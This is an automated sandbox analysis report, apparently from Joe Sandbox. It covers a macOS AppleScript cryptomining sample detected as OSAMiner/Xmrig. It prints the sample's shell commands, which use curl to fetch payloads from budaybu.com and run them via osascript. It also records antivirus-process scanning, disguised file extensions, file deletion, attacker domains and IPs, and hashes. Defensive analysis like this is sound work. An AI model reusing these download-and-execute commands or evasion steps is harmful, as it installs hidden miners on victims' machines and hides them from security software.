              Source: /bin/sh (PID: 575)Rm executable: /bin/rm -> rm /Users/henry/Library/11.pngJump to behavior
              Source: /bin/sh (PID: 551)Shell process: osascript /Users/henry/Library/k.plistJump to behavior
              Source: /bin/sh (PID: 588)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 589)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 590)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 591)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 598)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 599)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 600)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 601)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 604)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 605)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 606)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 607)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 609)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 610)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 611)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 612)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 615)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 616)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 617)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 618)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 620)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 621)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 622)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 623)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 626)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 627)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 628)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 629)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 631)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 632)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 633)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 634)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 637)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 638)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 639)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 640)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 642)Shell process: ps axJump to behavior
              Source: /bin/sh (PID: 643)Shell process: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 644)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 645)Shell process: awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 552)Shell process: rm /Users/henry/Library/k.plistJump to behavior
              Source: /bin/sh (PID: 554)Shell process: /usr/sbin/system_profiler SPHardwareDataTypeJump to behavior
              Source: /bin/sh (PID: 555)Shell process: awk /Serial/ { print $NF }Jump to behavior
              Source: /bin/sh (PID: 557)Shell process: ping -c 1 www.apple.comJump to behavior
              Source: /bin/sh (PID: 558)Shell process: curl http://www.budaybu100001.com:8080Jump to behavior
              Source: /bin/sh (PID: 559)Shell process: curl -L http://budaybu.com:8080/budaybu.png -o /Users/henry/Library/11.pngJump to behavior
              Source: /bin/sh (PID: 561)Shell process: osascript /Users/henry/Library/11.pngJump to behavior
              Source: /bin/sh (PID: 563)Shell process: df -g /Jump to behavior
              Source: /bin/sh (PID: 564)Shell process: grep /Jump to behavior
              Source: /bin/sh (PID: 565)Shell process: grep -v grepJump to behavior
              Source: /bin/sh (PID: 566)Shell process: awk {print $2}Jump to behavior
              Source: /bin/sh (PID: 568)Shell process: caffeinate -dJump to behavior
              Source: /bin/sh (PID: 570)Shell process: caffeinate -iJump to behavior
              Source: /bin/sh (PID: 572)Shell process: caffeinate -mJump to behavior
              Source: /bin/sh (PID: 574)Shell process: caffeinate -sJump to behavior
              Source: /bin/sh (PID: 577)Shell process: /usr/sbin/system_profiler SPHardwareDataTypeJump to behavior
              Source: /bin/sh (PID: 578)Shell process: awk /Serial/ { print $NF }Jump to behavior
              Source: /bin/sh (PID: 580)Shell process: mkdir /Users/henry/library/CachesJump to behavior
              Source: /bin/sh (PID: 581)Shell process: mkdir /Users/henry/library/Caches/com.apple.R0Jump to behavior
              Source: /bin/sh (PID: 582)Shell process: system_profiler SPHardwareDataTypeJump to behavior
              Source: /bin/sh (PID: 585)Shell process: curl -L http://budaybu.com:8080/ssl.zip -o /Users/henry/library/Caches/com.apple.R0/ssl.zipJump to behavior
              Source: /bin/sh (PID: 586)Shell process: /usr/bin/ditto -xk /Users/henry/library/Caches/com.apple.R0/ssl.zip /Users/henry/library/Caches/com.apple.R0Jump to behavior
              Source: /bin/sh (PID: 593)Shell process: rm /Users/henry/library/Caches/com.apple.R0/ssl.zipJump to behavior
              Source: /bin/sh (PID: 594)Shell process: pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 596)Shell process: /Users/henry/library/Caches/com.apple.R0/ssl4.plistJump to behavior
              Source: /bin/sh (PID: 602)Shell process: pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 613)Shell process: pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 624)Shell process: pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 635)Shell process: pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 575)Shell process: rm /Users/henry/Library/11.pngJump to behavior
              Source: /usr/bin/osascript (PID: 548)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
              Source: /usr/bin/osascript (PID: 551)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
              Source: /usr/sbin/system_profiler (PID: 556)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
              Source: /usr/bin/osascript (PID: 561)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
              Source: /usr/sbin/system_profiler (PID: 579)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
              Source: /usr/sbin/system_profiler (PID: 583)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
              Source: /usr/bin/osascript (PID: 548)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 548)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 551)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 551)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 561)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 561)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 548)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 548)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 551)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 551)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 561)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 561)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
              Source: /usr/bin/curl (PID: 585)ZIP file created: /Users/henry/Library/Caches/com.apple.R0/ssl.zipJump to dropped file
              Source: /bin/sh (PID: 591)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 601)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 607)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 612)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 618)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 623)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 629)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 634)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 640)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 645)Awk executable: /usr/bin/awk -> awk {print $1}Jump to behavior
              Source: /bin/sh (PID: 555)Awk executable: /usr/bin/awk -> awk /Serial/ { print $NF }Jump to behavior
              Source: /bin/sh (PID: 566)Awk executable: /usr/bin/awk -> awk {print $2}Jump to behavior
              Source: /bin/sh (PID: 578)Awk executable: /usr/bin/awk -> awk /Serial/ { print $NF }Jump to behavior
              Source: /usr/bin/osascript (PID: 548)Random device file read: /dev/randomJump to behavior
              Source: /usr/bin/osascript (PID: 551)Random device file read: /dev/randomJump to behavior
              Source: /usr/bin/osascript (PID: 561)Random device file read: /dev/randomJump to behavior
              Source: /usr/bin/osascript (PID: 548)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 551)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 561)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
              Source: /Users/henry/library/Caches/com.apple.R0/ssl4.plist (PID: 596)Lib SSL library: /Users/henry/library/Caches/com.apple.R0/openssl/lib/libssl.1.0.0.dylibJump to behavior

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Process executable has a file extension which is uncommon (probably to disguise the executable)Show sources
              Source: /bin/sh (PID: 596)Process executable with extension: /Users/henry/library/Caches/com.apple.R0/ssl4.plistJump to behavior
              Written Apple script contain uncommon file extension (probably to disguise the script)Show sources
              Source: /bin/sh (PID: 549)Uncommon extension: /Users/henry/Library/k.plistJump to dropped file
              Source: /usr/bin/curl (PID: 559)Uncommon extension: /Users/henry/Library/11.pngJump to dropped file
              Source: /usr/sbin/system_profiler (PID: 556)Sysctl read request: hw.model (6.2)Jump to behavior
              Source: /usr/sbin/system_profiler (PID: 579)Sysctl read request: hw.model (6.2)Jump to behavior
              Source: /usr/sbin/system_profiler (PID: 583)Sysctl read request: hw.model (6.2)Jump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Scans the system for common Anti-Virus softwareShow sources
              Source: /bin/sh (PID: 589)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 599)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 605)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 610)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 616)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 621)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 627)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 632)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 638)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 643)Greps for common AV programs: /usr/bin/grep grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /usr/sbin/system_profiler (PID: 556)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
              Source: /usr/sbin/system_profiler (PID: 556)Sysctl read request: hw.memsize (6.24)Jump to behavior
              Source: /usr/sbin/system_profiler (PID: 579)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
              Source: /usr/sbin/system_profiler (PID: 579)Sysctl read request: hw.memsize (6.24)Jump to behavior
              Source: /usr/sbin/system_profiler (PID: 583)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
              Source: /usr/sbin/system_profiler (PID: 583)Sysctl read request: hw.memsize (6.24)Jump to behavior
              Source: /bin/sh (PID: 549)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 550)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 587)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 592)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 597)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 603)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 614)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 619)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 625)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 630)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 636)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 641)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 552)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 553)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 557)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 558)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 559)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 560)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 562)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 567)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 569)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 571)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 573)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 576)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 581)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 585)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 586)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 593)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 594)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 595)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 602)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 613)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 635)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /bin/sh (PID: 575)Sysctl requested: kern.hostname (1.10)Jump to behavior
              Source: /usr/bin/osascript (PID: 548)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
              Source: /usr/bin/osascript (PID: 551)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
              Source: /bin/sh (PID: 554)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler SPHardwareDataTypeJump to behavior
              Source: /usr/sbin/system_profiler (PID: 554)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior
              Source: /bin/sh (PID: 577)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler SPHardwareDataTypeJump to behavior
              Source: /usr/sbin/system_profiler (PID: 577)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior
              Source: /bin/sh (PID: 582)System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataTypeJump to behavior
              Source: /usr/sbin/system_profiler (PID: 582)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsCommand and Scripting Interpreter11Path InterceptionPath InterceptionMasquerading2OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAppleScript3Logon Script (Windows)Logon Script (Windows)Scripting1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSystem Information Discovery51Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Shell
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1344210 Sample: gqnmir4Hus Startdate: 15/01/2021 Architecture: MAC Score: 80 87 budaybu100001.com 43.249.204.231, 49243, 49244, 49245 SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong Hong Kong 2->87 89 donate.xmr-stak.net 185.134.22.134, 14441, 49247 BANDWIDTH-ASGB United Kingdom 2->89 91 3 other IPs or domains 2->91 93 Yara detected OSAMiner 2->93 95 Yara detected Xmrig cryptocurrency miner 2->95 97 Found strings related to Crypto-Mining 2->97 12 mono-sgen32 sudo 2->12         started        signatures3 process4 process5 14 sudo osascript 12->14         started        process6 16 osascript sh 14->16         started        18 osascript sh 14->18         started        20 osascript sh curl 1 14->20         started        24 6 other processes 14->24 file7 26 sh osascript 3 16->26         started        29 sh osascript 18->29         started        77 /Users/henry/Library/11.png, data 20->77 dropped 99 Written Apple script contain uncommon file extension (probably to disguise the script) 20->99 101 Writes compiled Apple script to disk (with potentially malicious intention) 20->101 79 /Users/henry/Library/k.plist, data 24->79 dropped 31 sh system_profiler 24->31         started        33 sh awk 24->33         started        signatures8 process9 file10 81 /Users/henry/Libra....apple.R0/pools.txt, ASCII 26->81 dropped 83 /Users/henry/Libra...om.apple.R0/cpu.txt, ASCII 26->83 dropped 85 /Users/henry/Libra...apple.R0/config.txt, ASCII 26->85 dropped 35 osascript sh 26->35         started        37 osascript sh 26->37         started        39 osascript sh 26->39         started        49 16 other processes 26->49 41 osascript sh 29->41         started        43 osascript sh 29->43         started        45 osascript sh 29->45         started        52 8 other processes 29->52 47 system_profiler 31->47         started        process11 file12 54 sh caffeinate 35->54         started        57 sh caffeinate 37->57         started        59 sh caffeinate 39->59         started        63 4 other processes 41->63 65 4 other processes 43->65 67 4 other processes 45->67 75 /Users/henry/Libra...ple.R0/.BC.T_brE6fG, Mach-O 49->75 dropped 61 sh caffeinate 49->61         started        69 8 other processes 49->69 71 28 other processes 52->71 process13 signatures14 103 Executes the "caffeinate" command used to prevent the system from disk/display/system sleeping indicative for miners 54->103 105 Process executable has a file extension which is uncommon (probably to disguise the executable) 69->105 73 system_profiler 69->73         started        107 Scans the system for common Anti-Virus software 71->107 process15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              cam-macmac-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              budaybu.com
              		43.249.204.231
              		truefalse
                		unknown
                budaybu100001.com
                		43.249.204.231
                		truefalse
                  		unknown
                  donate.xmr-stak.net
                  		185.134.22.134
                  		truefalse
                    		unknown
                    www.budaybu100001.com
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.budaybu100001.com:8080/false
                        		unknown
                        http://budaybu.com:8080/ssl.zipfalse
                          		unknown
                          http://budaybu.com:8080/budaybu.pngfalse
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/fireice-uk/cryptonote-speedup-demo.BC.T_brE6fG.340.drfalse
                              		high
                              https://ryo-currency.com.BC.T_brE6fG.340.drfalse
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                185.134.22.134
                                		unknownUnited Kingdom
                                		25369BANDWIDTH-ASGBfalse
                                17.253.57.205
                                		unknownUnited States
                                		6185APPLE-AUSTINUSfalse
                                43.249.204.231
                                		unknownHong Kong
                                		38197SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKongfalse

                                General Information

                                Joe Sandbox Version:
                                Analysis ID:1344210
                                Start date:15.01.2021
                                Start time:10:59:30
                                Joe Sandbox Product:Cloud
                                Overall analysis duration:0h 10m 53s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:gqnmir4Hus
                                Cookbook file name:Mac load provided binary as normal user.jbs
                                Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
                                Detection:MAL
                                Classification:mal80.evad.mine.mac@0/12@3/0
                                Warnings:
                                Show All
                                • Excluded IPs from analysis (whitelisted): 23.5.107.206
                                • Excluded domains from analysis (whitelisted): e6858.dsce9.akamaiedge.net


                                Runtime Messages

                                Command:sudo -u henry osascript "/Users/henry/Desktop/gqnmir4Hus.scpt"
                                Exit Code:
                                Exit Code Info:
                                Killed:True
                                Standard Output:

                                Standard Error:2021-01-15 12:00:14.199 osascript[548:7788] ApplePersistence=NO

                                Created / dropped Files

                                /Users/henry/Library/11.png
                                Process:/usr/bin/curl
                                File Type:data
                                Category:dropped
                                Size (bytes):6488
                                Entropy (8bit):5.198191748828326
                                Encrypted:false
                                SSDEEP:192:emGz4k1u8/yfXD8bkNylw3KDqJe935+7MOT0NyVd:oEk1u8/yb8b5TT15A0Nyz
                                MD5:30F0B095232765263F50DE7707C6DEAD
                                SHA1:80BC7FE45FFA101420CF60292AB69FAB853D9D5F
                                SHA-256:FF9FA2EE1D42CBDE7307C10907470E4950DB5085D9CB43C3ADE118DA9BFE35C3
                                SHA-512:D8C2BE1B26D17AE2B3DCB3975B8ED314512736AEC8197D48B9F27B8D87B9D0941BDC1D82FFC735D45D0131CBF1E8404FCE38517A2AA73BBC8DFA1297A6D730D7
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_OSAMiner, Description: Yara detected OSAMiner, Source: /Users/henry/Library/11.png, Author: Joe Security
                                Reputation:low
                                Preview: FasdUAS 1.101.10......................................................................0..e.......0..d.......0..filee..fileE......aevtoappnull........****.........................0..e...................................0.._s.......................0.._s.......0..x.......0..c.............................ID ......kocl......cobj......corecnte****........****....d......pcnt......TEXT......kfrmID ....+..,E.O....[..l...kh........,F[OY..O*...0E...........................0..d...................................0.._s.......................0.._s.......0..x.......0..c.............................ID ......kocl......cobj......corecnte****........****....d......pcnt......TEXT......kfrmID ....+..,E.O....[..l...kh........,F[OY..O*...0E...........................0..filee..fileE.................................0.._s...................0.._s.................................[. .-.e. ............:. .]. .&.&. .e.c.h.o. .t.r.u.e. .|.|. .e.c.h.o. .f.a.l.s.e......sysoexecTEXT........TEXT......bool..............
                                /Users/henry/Library/Caches/com.apple.R0/.BC.T_brE6fG
                                Process:/usr/bin/ditto
                                File Type:Mach-O 64-bit executable
                                Category:dropped
                                Size (bytes):698576
                                Entropy (8bit):6.473417044784649
                                Encrypted:false
                                SSDEEP:6144:hrsmr3fQhN/WXgC5gP0Er5MhsiFofTVcfnDPNb/VS3bzQfC0RzcZui2SEX9QcPQw:Vsmr3EsX+0EreFGmB/U3ECcSEtL6hM
                                MD5:DEB6C97315615FAA44A0AC07244E7570
                                SHA1:CFB1A0CD345BB2CBD65ED1E6602140829382A9B4
                                SHA-256:97FEBB1AA15AD7B1C321F056F7164526EB698297E0FEA0C23BD127498BA3E9BB
                                SHA-512:E142781320692F1FE708061773BA87F988861AFC6CE27A00A3BE5F2DF492B42000BF3D95974D7AAED10CD763FC9B86A3DA07E9579CF2634C8E0466614BF633BC
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /Users/henry/Library/Caches/com.apple.R0/.BC.T_brE6fG, Author: Joe Security
                                Reputation:low
                                Preview: ..........................!.........H...__PAGEZERO..........................................................x...__TEXT..........................................................__text..........__TEXT..........."..............."..............................__stubs.........__TEXT...........)......@........)..............................__stub_helper...__TEXT..........................................................__gcc_except_tab__TEXT...........6...............6..............................__const.........__TEXT..........Pe......./......Pe..............................__cstring.......__TEXT..................>j......................................__unwind_info...__TEXT..........0...............0.......................................__DATA...................p...............0......................__nl_symbol_ptr.__DATA..........................................................__got...........__DATA..........................................................__la_symbol_ptr.__DATA..........
                                /Users/henry/Library/Caches/com.apple.R0/config.txt
                                Process:/usr/bin/osascript
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):343
                                Entropy (8bit):4.477442504666964
                                Encrypted:false
                                SSDEEP:6:MdfSpz6ODJf9M2KYcWKMHxJKMHK0oioKBXrJni73wivqVBAUYvkcldHh:MdqoJ2KGxJKMq8oKdti73NSmZdHh
                                MD5:29176077682E1A92E8CEE52118043479
                                SHA1:40247E968E0F29062CE2E7A24E642648E4EA9E09
                                SHA-256:2FCAA943F404A12C8B951045B02D5AC58EF8222196518EA6624BDDD178BA978C
